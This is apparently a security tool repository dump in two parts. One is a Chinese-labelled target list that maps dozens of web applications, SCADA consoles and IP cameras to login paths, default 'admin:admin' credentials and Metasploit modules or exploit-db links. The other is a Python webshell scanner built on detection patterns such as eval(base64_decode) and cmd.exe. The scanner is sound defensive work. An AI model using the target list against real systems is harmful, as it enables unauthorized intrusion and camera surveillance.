版本: '' 271 | exp: './exploits/multi/http/extplorer_upload_exec.rb' 272 | 默认密码: 'admin:admin' 273 | 274 | Splunk: 275 | 路径1: '/en-US/app/launcher/home' 276 | 路径2: '/en-US/manager/search/apps/local' 277 | 版本: '' 278 | exp: './exploit/multi/http/splunk_upload_app_exec, http://blog.7elements.co.uk/2012/11/splunk-with-great-power-comes-great-responsibility.html' 279 | 默认密码: 'admin:admin' 280 | 281 | FreePBX: 282 | 路径1: '/admin/admin/config.php?type=setup&display=general' 283 | 路径2: '/admin/admin/reports.php' 284 | 版本: '' 285 | exp: 'https://www.exploit-db.com/search/?description=freepbx' 286 | 默认密码: 'admin:admin' 287 | 288 | ManageEngine ServiceDesk Plus: 289 | 路径1: '/WOListView.do' 290 | 路径2: '/admin/admin/reports.php' 291 | 版本: '/SetUpWizard.do?forwardTo=site' 292 | exp: './exploit/multi/http/manageengine_auth_upload' 293 | 默认密码: 'administrator:administrator' 294 | 295 | WhatsUp Gold IPSwitch: 296 | 路径1: '/NmConsole/CoreNm/User/DlgUserLogin/DlgUserLogin.asp' 297 | 路径2: '/NmConsole/Workspace/HomeWorkspace/HomeWorkspace.asp' 298 | 版本: 'Ipswitch WhatsUp Gold premium Edition' 299 | exp: 'https://www.exploit-db.com/exploits/20035/' 300 | 默认密码: 'admin:admin' 301 | 302 | OpenX: 303 | 路径1: '/openx/' 304 | 路径2: '' 305 | 版本: '' 306 | exp: './exploits/multi/http/openx_backdoor_php.rb' 307 | 默认密码: 'admin:admin' 308 | 309 | Glossword: 310 | 路径1: '/glossword/1.8/' 311 | 路径2: '' 312 | 版本: '' 313 | exp: './exploits/multi/http/glossword_upload_exec.rb' 314 | 默认密码: 'admin:admin' 315 | 316 | GLPI: 317 | 路径1: '/glpi/' 318 | 路径2: '' 319 | 版本: '' 320 | exp: './exploits/multi/http/glpi_install_rce.rb' 321 | 默认密码: 'admin:admin' 322 | 323 | Kordil EDMS: 324 | 路径1: '/kordil_edms/' 325 | 路径2: '' 326 | 版本: '' 327 | exp: './exploits/multi/http/kordil_edms_upload_exec.rb' 328 | 默认密码: 'admin:admin' 329 | 330 | Movable Type: 331 | 路径1: '/mt' 332 | 路径2: '' 333 | 版本: '' 334 | exp: './exploits/multi/http/movabletype_upgrade_exec.rb' 335 | 默认密码: 'admin:admin' 336 | 337 | Zabbix: 338 | 路径1: '/zabbix/' 339 | 路径2: '/zabbix/scripts.php' 340 | 版本: '' 341 | exp: './exploits/multi/http/zabbix_script_exec.rb' 342 | 默认密码: 'admin:admin' 343 | 344 | PHP Volunteer Management System: 345 | 路径1: '/bf102/' 346 | 路径2: '' 347 | 版本: '' 348 | exp: './exploits/multi/http/php_volunteer_upload_exec.rb' 349 | 默认密码: 'admin:admin' 350 | 351 | appRain CMF: 352 | 路径1: '/appRain-q-0.1.5' 353 | 路径2: '' 354 | 版本: '' 355 | exp: './exploits/multi/http/apprain_upload_exec.rb' 356 | 默认密码: 'admin:admin' 357 | 358 | Mutiny: 359 | 路径1: '/interface/' 360 | 路径2: '' 361 | 版本: '' 362 | exp: './exploits/multi/http/mutiny_subnetmask_exec.rb' 363 | 默认密码: 'admin:admin' 364 | 365 | Tiki Wiki CMS: 366 | 路径1: '/tiki/' 367 | 路径2: '' 368 | 版本: '' 369 | exp: './exploits/unix/webapp/tikiwiki_unserialize_exec.rb' 370 | 默认密码: 'admin:admin' 371 | 372 | Invision Power Board: 373 | 路径1: '/forums/' 374 | 路径2: '' 375 | 版本: '' 376 | exp: './exploits/unix/webapp/invision_pboard_unserialize_exec.rb' 377 | 默认密码: 'admin:admin' 378 | 379 | App_Name: 380 | 路径1: '/wordpress' 381 | 路径2: '' 382 | 版本: '' 383 | exp: './exploits/unix/webapp/wp_property_upload_exec.rb, ./exploits/unix/webapp/wp_asset_manager_upload_exec.rb' 384 | 默认密码: 'admin:admin' 385 | 386 | Zimbra Admin: 387 | 路径1: '/zimbraAdmin' 388 | 路径2: '' 389 | 版本: '' 390 | exp: './exploits/unix/webapp/zimbra_lfi.rb' 391 | 默认密码: 'admin:admin' 392 | 393 | Nagios3: 394 | 路径1: '/nagios3/cgi-bin/history.cgi' 395 | 路径2: '' 396 | 版本: '' 397 | exp: './exploits/unix/webapp/nagios3_history_cgi.rb' 398 | 默认密码: 'admin:admin' 399 | 400 | PHP-Charts: 401 | 路径1: '/php-charts_v1.0/' 402 | 路径2: '' 403 | 版本: '' 404 | exp: './exploits/unix/webapp/php_charts_exec.rb' 405 | 默认密码: 'admin:admin' 406 | 407 | Open Flash Chart v2: 408 | 路径1: '/php-ofc-library/' 409 | 路径2: '' 410 | 版本: '' 411 | exp: './exploits/unix/webapp/open_flash_chart_upload_exec.rb' 412 | 默认密码: 'admin:admin' 413 | 414 | LibrettoCMS File Manager: 415 | 路径1: '/librettoCMS_v.2.2.2/' 416 | 路径2: '' 417 | 版本: '' 418 | exp: './exploits/unix/webapp/libretto_upload_exec.rb' 419 | 默认密码: 'admin:admin' 420 | 421 | Horde Framework: 422 | 路径1: '/horde/' 423 | 路径2: '' 424 | 版本: '' 425 | exp: './exploits/unix/webapp/horde_unserialize_exec.rb' 426 | 默认密码: 'admin:admin' 427 | 428 | XODA: 429 | 路径1: '/xoda/' 430 | 路径2: '' 431 | 版本: '' 432 | exp: './exploits/unix/webapp/xoda_file_upload.rb' 433 | 默认密码: 'admin:admin' 434 | 435 | ZoneMinder Video Server: 436 | 路径1: '/zm/' 437 | 路径2: '' 438 | 版本: '' 439 | exp: './exploits/unix/webapp/zoneminder_packagecontrol_exec.rb' 440 | 默认密码: 'admin:admin' 441 | 442 | SePortal: 443 | 路径1: '/seportal' 444 | 路径2: '' 445 | 版本: '' 446 | exp: './exploits/unix/webapp/seportal_sqli_exec.rb' 447 | 默认密码: 'admin:admin' 448 | 449 | WebTester: 450 | 路径1: '/webtester5/' 451 | 路径2: '' 452 | 版本: '' 453 | exp: './exploits/unix/webapp/webtester_exec.rb' 454 | 默认密码: 'admin:admin' 455 | 456 | Hastymail: 457 | 路径1: '/hastymail2/' 458 | 路径2: '' 459 | 版本: '' 460 | exp: './exploits/unix/webapp/hastymail_exec.rb' 461 | 默认密码: 'admin:admin' 462 | 463 | Joomla: 464 | 路径1: '/joomla' 465 | 路径2: '' 466 | 版本: '' 467 | exp: './exploits/unix/webapp/joomla_media_upload_exec.rb' 468 | 默认密码: 'admin:admin' 469 | 470 | Kimai Time Tracking: 471 | 路径1: '/kimai/' 472 | 路径2: '' 473 | 版本: '' 474 | exp: './exploits/unix/webapp/kimai_sqli.rb' 475 | 默认密码: 'admin:admin' 476 | 477 | FlashChat: 478 | 路径1: '/chat/' 479 | 路径2: '' 480 | 版本: '' 481 | exp: './exploits/unix/webapp/flashchat_upload_exec.rb' 482 | 默认密码: 'admin:admin' 483 | 484 | Simple E-Document: 485 | 路径1: '/simple_e_document_v_1_31/' 486 | 路径2: '' 487 | 版本: '' 488 | exp: './exploits/unix/webapp/simple_e_document_upload_exec.rb' 489 | 默认密码: 'admin:admin' 490 | 491 | EGallery: 492 | 路径1: '/sample' 493 | 路径2: '' 494 | 版本: '' 495 | exp: './exploits/unix/webapp/egallery_upload_exec.rb' 496 | 默认密码: 'admin:admin' 497 | 498 | OpenEMR: 499 | 路径1: '/openemr' 500 | 路径2: '' 501 | 版本: '' 502 | exp: './exploits/unix/webapp/openemr_upload_exec.rb, ./exploits/unix/webapp/openemr_sqli_privesc_upload.rb' 503 | 默认密码: 'admin:admin' 504 | 505 | Basilic: 506 | 路径1: '/basilic-1.5.14/' 507 | 路径2: '' 508 | 版本: '' 509 | exp: './exploits/unix/webapp/basilic_diff_exec.rb' 510 | 默认密码: 'admin:admin' 511 | 512 | Narcissus: 513 | 路径1: '/narcissus-master/' 514 | 路径2: '' 515 | 版本: '' 516 | exp: './exploits/unix/webapp/narcissus_backend_exec.rb' 517 | 默认密码: 'admin:admin' 518 | 519 | Project Pier: 520 | 路径1: '/pp088/' 521 | 路径2: '' 522 | 版本: '' 523 | exp: './exploits/unix/webapp/projectpier_upload_exec.rb' 524 | 默认密码: 'admin:admin' 525 | 526 | OpenSIS: 527 | 路径1: '/opensis/' 528 | 路径2: '' 529 | 版本: '' 530 | exp: './exploits/unix/webapp/opensis_modname_exec.rb' 531 | 默认密码: 'admin:admin' 532 | 533 | V-CMS: 534 | 路径1: '/vcms/' 535 | 路径2: '' 536 | 版本: '' 537 | exp: './exploits/linux/http/vcms_upload.rb' 538 | 默认密码: 'admin:admin' 539 | 540 | Zabbix: 541 | 路径1: '/zabbix' 542 | 路径2: '' 543 | 版本: '' 544 | exp: './exploits/linux/http/zabbix_sqli.rb' 545 | 默认密码: 'admin:zabbix' 546 | 547 | WebCalendar: 548 | 路径1: '/WebCalendar-1.2.4/' 549 | 路径2: '' 550 | 版本: '' 551 | exp: './exploits/linux/http/webcalendar_settings_exec.rb' 552 | 默认密码: 'admin:admin' 553 | 554 | Symantec Web Gateway: 555 | 路径1: '/spywall/pbcontrol.php' 556 | 路径2: '' 557 | 版本: '' 558 | exp: './exploits/linux/http/symantec_web_gateway_pbcontrol.rb' 559 | 默认密码: 'admin:admin' 560 | 561 | WeBid: 562 | 路径1: '/WeBid' 563 | 路径2: '' 564 | 版本: '' 565 | exp: './exploits/linux/http/webid_converter.rb' 566 | 默认密码: 'admin:admin' 567 | 568 | DoliWamp: 569 | 路径1: '/dolibarr/' 570 | 路径2: '' 571 | 版本: '' 572 | exp: './exploits/linux/http/dolibarr_cmd_exec.rb, ./auxiliary/gather/doliwamp_traversal_creds.rb' 573 | 默认密码: 'admin:admin' 574 | 575 | Ruby on Rails Devise: 576 | 路径1: '/users/password' 577 | 路径2: '' 578 | 版本: '' 579 | exp: './auxiliary/admin/http/rails_devise_pass_reset.rb' 580 | 默认密码: 'admin:admin' 581 | 582 | Linksys WRT54GL: 583 | 路径1: '/apply.cgi' 584 | 路径2: '' 585 | 版本: '' 586 | exp: './auxiliary/admin/http/linksys_wrt54gl_exec.rb' 587 | 默认密码: 'admin:admin' 588 | 589 | JBoss Seam 2: 590 | 路径1: '/seam-booking/home.seam' 591 | 路径2: '' 592 | 版本: '' 593 | exp: './auxiliary/admin/http/jboss_seam_exec.rb' 594 | 默认密码: 'admin:admin' 595 | 596 | Plixer Scrutinizer NetFlow: 597 | 路径1: '/cgi-bin/admin.cgi' 598 | 路径2: '' 599 | 版本: '' 600 | exp: './auxiliary/admin/http/scrutinizer_add_user.rb' 601 | 默认密码: 'admin:admin' 602 | 603 | Openbravo ERP: 604 | 路径1: '/openbravo/' 605 | 路径2: '' 606 | 版本: '' 607 | exp: './auxiliary/admin/http/openbravo_xxe.rb' 608 | 默认密码: 'admin:admin' 609 | 610 | Advantech WebAccess: 611 | 路径1: '/BEMS' 612 | 路径2: '' 613 | 版本: '' 614 | exp: './auxiliary/admin/scada/advantech_webaccess_dbvisitor_sqli.rb' 615 | 默认密码: 'admin:admin' 616 | 617 | GE Proficy Cimplicity WebView: 618 | 路径1: '/CimWeb' 619 | 路径2: '' 620 | 版本: '' 621 | exp: './auxiliary/admin/scada/ge_proficy_substitute_traversal.rb' 622 | 默认密码: 'admin:admin' 623 | 624 | Cisco Secure ACS: 625 | 路径1: '/PI/services/UCP/' 626 | 路径2: '' 627 | 版本: '' 628 | exp: './auxiliary/admin/cisco/cisco_secure_acs_bypass.rb' 629 | 默认密码: 'admin:admin' 630 | 631 | CouchDB: 632 | 路径1: '/_all_dbs' 633 | 路径2: '' 634 | 版本: '' 635 | exp: './auxiliary/scanner/couchdb/couchdb_enum.rb' 636 | 默认密码: 'admin:admin' 637 | 638 | SAP SOAP Service: 639 | 路径1: '/sap/bc/soap/rfc' 640 | 路径2: '' 641 | 版本: '' 642 | exp: './auxiliary/scanner/sap/sap_soap_rfc_brute_login.rb' 643 | 默认密码: 'admin:admin' 644 | 645 | Apache ActiveMQ: 646 | 路径1: '/admin/index.jsp' 647 | 路径2: '' 648 | 版本: '' 649 | exp: './auxiliary/scanner/http/apache_activemq_source_disclosure.rb' 650 | 默认密码: 'admin:admin' 651 | 652 | SVN: 653 | 路径1: '/.svn/' 654 | 路径2: '' 655 | 版本: '' 656 | exp: './auxiliary/scanner/http/svn_wcdb_scanner.rb' 657 | 默认密码: 'admin:admin' 658 | 659 | Bitweaver: 660 | 路径1: '/bitweaver/' 661 | 路径2: '' 662 | 版本: '' 663 | exp: './auxiliary/scanner/http/bitweaver_overlay_type_traversal.rb' 664 | 默认密码: 'admin:admin' 665 | 666 | Dell iDRAC: 667 | 路径1: '/data/login' 668 | 路径2: '' 669 | 版本: '' 670 | exp: './auxiliary/scanner/http/dell_idrac.rb' 671 | 默认密码: 'admin:admin' 672 | 673 | JBoss Status Servlet: 674 | 路径1: '/status' 675 | 路径2: '' 676 | 版本: '' 677 | exp: './auxiliary/scanner/http/jboss_status.rb' 678 | 默认密码: 'admin:admin' 679 | 680 | OpenMind Message-OS Portal: 681 | 路径1: '/provision/index.php' 682 | 路径2: '' 683 | 版本: '' 684 | exp: './auxiliary/scanner/http/openmind_messageos_login.rb' 685 | 默认密码: 'admin:admin' 686 | 687 | ClanSphere: 688 | 路径1: '/clansphere_2011.3/' 689 | 路径2: '' 690 | 版本: '' 691 | exp: './auxiliary/scanner/http/clansphere_traversal.rb' 692 | 默认密码: 'admin:admin' 693 | 694 | InfoVista VistaPortal Application: 695 | 路径1: '/VPortal/mgtconsole/CheckPassword.jsp' 696 | 路径2: '' 697 | 版本: '' 698 | exp: './auxiliary/scanner/http/infovista_enum.rb' 699 | 默认密码: 'admin:admin' 700 | 701 | Atlassian Crowd: 702 | 路径1: '/crowd/services' 703 | 路径2: '' 704 | 版本: '' 705 | exp: './auxiliary/scanner/http/atlassian_crowd_fileaccess.rb' 706 | 默认密码: 'admin:admin' 707 | 708 | S40 CMS: 709 | 路径1: '/s40/' 710 | 路径2: '' 711 | 版本: '' 712 | exp: './auxiliary/scanner/http/s40_traversal.rb' 713 | 默认密码: 'admin:admin' 714 | 715 | MyBB: 716 | 路径1: '/forum' 717 | 路径2: '' 718 | 版本: '' 719 | exp: './auxiliary/gather/mybb_db_fingerprint.rb' 720 | 默认密码: 'admin:admin' 721 | 722 | IBM Lotus Notes: 723 | 路径1: '/userinfo/search' 724 | 路径2: '' 725 | 版本: '' 726 | exp: './auxiliary/gather/ibm_sametime_enumerate_users.rb' 727 | 默认密码: 'admin:admin' 728 | 729 | Apache Rave: 730 | 路径1: '/portal' 731 | 路径2: '' 732 | 版本: '' 733 | exp: './auxiliary/gather/apache_rave_creds.rb' 734 | 默认密码: 'admin:admin' 735 | 736 | Drupal OpenID: 737 | 路径1: '/drupal' 738 | 路径2: '' 739 | 版本: '' 740 | exp: './auxiliary/gather/drupal_openid_xxe.rb' 741 | 默认密码: 'admin:admin' 742 | 743 | Symantec Endpoint Protection Manager: 744 | 路径1: '/servlet/ConsoleServlet' 745 | 路径2: '' 746 | 版本: '' 747 | exp: '/exploits/windows/http/sepm_auth_bypass_rce' 748 | 默认密码: 'admin:admin' 749 | 750 | Panasonic Network Camera WV-SF335: 751 | 路径1: '/live/index.html?Language=0' 752 | 路径2: '/admin/index.html?Language=0' 753 | 版本: '' 754 | exp: 'Unauthenticate access to LIVE video feed' 755 | 默认密码: 'admin:admin' 756 | 757 | AXIS Q7404 Video Encoder: 758 | 路径1: '/view/viewer_index.shtml' 759 | 路径2: '/operator/action_rules.shtml' 760 | 版本: '' 761 | exp: 'Unauthenticate access to LIVE video feed' 762 | 默认密码: 'admin:admin' 763 | 764 | Vivotek Mega-Pixel Network Camera: 765 | 路径1: '/setup/system/system.html' 766 | 路径2: '/media/media_settings.html' 767 | 版本: '' 768 | exp: 'Unauthenticate access to LIVE video feed' 769 | 默认密码: 'admin:admin' 770 | 771 | SVSi N-Command N8002: 772 | 路径1: '/userAdmin.php' 773 | 路径2: '' 774 | 版本: '' 775 | exp: 'Unauthenticate access to LIVE video feed' 776 | 默认密码: 'admin:admin' 777 | 778 | SVSi N-Series 2000 Decoder: 779 | 路径1: '/localplay.php' 780 | 路径2: '/edid.php' 781 | 版本: '' 782 | exp: 'Unauthenticate access to LIVE video feed' 783 | 默认密码: 'admin:admin' 784 | 785 | AlienVault USM: 786 | 路径1: '/ossim/session/login.php' 787 | 路径2: '/ossim/#configuration/administration/users' 788 | 版本: '' 789 | exp: 'https://www.exploit-db.com/search/?text=alienvault' 790 | 默认密码: 'admin:admin' 791 | 792 | Arecont Vision Mega Pixel Panoramic Camera: 793 | 路径1: '/livevideo.html' 794 | 路径2: '' 795 | 版本: 'dinapage' 796 | exp: 'Unauthenticate access to LIVE video feed' 797 | 默认密码: 'admin:admin' 798 | -------------------------------------------------------------------------------- /webshellscan/README.md: -------------------------------------------------------------------------------- 1 | # python webshellscan.py /root/ 2 | -------------------------------------------------------------------------------- /webshellscan/webshellscan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #coding=utf-8 3 | import sys 4 | reload(sys) 5 | sys.setdefaultencoding("utf-8") 6 | 7 | import os 8 | import sys 9 | import re 10 | 11 | rulelist = [ 12 | '(\$_(GET|POST|REQUEST)\[.{0,15}\]\(\$_(GET|POST|REQUEST)\[.{0,15}\]\))', 13 | '(base64_decode\([\'"][\w\+/=]{200,}[\'"]\))', 14 | 'eval\(base64_decode\(', 15 | '(eval\(\$_(POST|GET|REQUEST)\[.{0,15}\]\))', 16 | '(assert\(\$_(POST|GET|REQUEST)\[.{0,15}\]\))', 17 | '(\$[\w_]{0,15}\(\$_(POST|GET|REQUEST)\[.{0,15}\]\))', 18 | '(wscript\.shell)', 19 | '(gethostbyname\()', 20 | '(cmd\.exe)', 21 | '(shell\.application)', 22 | '(documents\s+and\s+settings)', 23 | '(system32)', 24 | '(serv-u)', 25 | '(提权)', 26 | '(phpspy)', 27 | '(后门)', 28 | '(webshell)', 29 | '(Program\s+Files)' 30 | ] 31 | 32 | def Scan(path): 33 | for root,dirs,files in os.walk(path): 34 | for filespath in files: 35 | isover = False 36 | if '.' in filespath: 37 | ext = filespath[(filespath.rindex('.')+1):] 38 | if ext=='php' or ext=='jsp' or ext=='asp' or ext=='aspx' or ext=='jspx': 39 | file= open(os.path.join(root,filespath)) 40 | filestr = file.read() 41 | file.close() 42 | for rule in rulelist: 43 | result = re.compile(rule).findall(filestr) 44 | if result: 45 | print '文件:'+os.path.join(root,filespath) 46 | print '恶意代码:'+str(result[0]) 47 | print '\n\n' 48 | break 49 | 50 | if os.path.lexists(sys.argv[1]): 51 | print('\n\n开始扫描:'+sys.argv[1]) 52 | print(' 可疑文件 ') 53 | print('########################################') 54 | Scan(sys.argv[1]) 55 | print('########################################') 56 | print('提示:扫描完成-- O(∩_∩)O哈哈~') 57 | else: 58 | print '提示:指定的扫描目录不存在--- ( \'o′)!!凸' 59 | --------------------------------------------------------------------------------